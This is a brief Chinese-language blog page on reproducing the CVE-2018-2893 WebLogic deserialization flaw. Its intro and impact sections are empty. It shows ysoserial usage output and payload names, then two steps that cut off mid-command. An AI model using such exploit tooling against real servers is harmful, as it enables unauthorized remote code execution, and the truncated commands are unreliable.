# (CVE-2018-2893)Weblogic WLS核心组件反序列化漏洞
=============
一、漏洞简介
————
二、漏洞影响
————
三、复现过程
————
### Step 1
`java -jar ysoserial-cve-2018-2893.jar`
WHY SO SERIAL?
Usage: java -jar ysoserial-[version]-all.jar [payload] ‘[command]’
Available payload types:
Payload Authors Dependencies
——- ——- ————
JRMPClient @mbechler
JRMPClient2
JRMPClient3
JRMPClient4
Jdk7u21 @frohoff
### Step 2
`java -jar ysoserial-cve-2018-2893.jar JRMPClient4 “
### Step 3
python weblogic.py \
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容